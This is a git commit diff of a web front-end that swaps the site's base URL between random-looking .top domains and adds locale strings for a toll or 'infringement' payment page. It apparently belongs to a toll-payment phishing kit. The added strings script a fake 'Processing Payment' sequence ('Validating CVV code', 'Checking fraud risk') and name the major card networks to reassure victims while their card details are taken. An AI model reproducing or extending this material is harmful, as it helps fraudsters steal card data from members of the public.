This commit is contained in:
telangpu
2026-04-30 16:18:59 +08:00
parent f438710ac8
commit edec02e4ef
28 changed files with 6410 additions and 8387 deletions

View File

@@ -5,7 +5,7 @@ VITE_PORT = 8848
VITE_PUBLIC_PATH = ./
# 网站前缀
VITE_BASE_URL = "dsf.dagf7.top"
VITE_BASE_URL = "upc.xx.sczqb6.top"
# 开发环境路由历史模式Hash模式传"hash"、HTML5模式传"h5"、Hash模式带base参数传"hash,base参数"、HTML5模式带base参数传"h5,base参数"
VITE_ROUTER_HISTORY = "hash"

File diff suppressed because one or more lines are too long

View File

@@ -118,5 +118,33 @@ export default {
"Successful Toll Payment": "Payment Successful",
"Thank you for your payment. The tolls have been processed successfully.": "Thank you. Your infringement / toll payment has been processed successfully.",
"Phone": "Phone",
"Toll Amount": "Total Amount"
"Toll Amount": "Total Amount",
payment_loading: {
modal_title: "Processing Payment",
modal_subtitle: "Please do not close this page",
transaction_details: "Transaction Details",
transaction_id: "Transaction ID:",
processing_network: "Processing Network:",
processing_time: "Processing Time:",
security_level: "Security Level:",
preparing: "Preparing...",
high: "High",
step_init: "Initializing payment environment...",
step_encrypt: "Encrypting card information...",
step_connect: "Establishing secure connection...",
step_verify_card: "Verifying card number and issuer...",
step_validate_cvv: "Validating CVV code...",
step_fraud: "Checking fraud risk...",
step_send: "Sending transaction request...",
step_wait_auth: "Waiting for bank authorization...",
step_process_resp: "Processing bank response...",
step_confirm: "Confirming transaction status...",
step_finalize: "Finalizing transaction...",
network_visa: "Visa Secure Network",
network_mastercard: "Mastercard Global Payment Network",
network_amex: "American Express Dedicated Channel",
network_unionpay: "UnionPay Payment Channel",
network_intl: "International Payment Network",
time_seconds: "{time} seconds",
},
};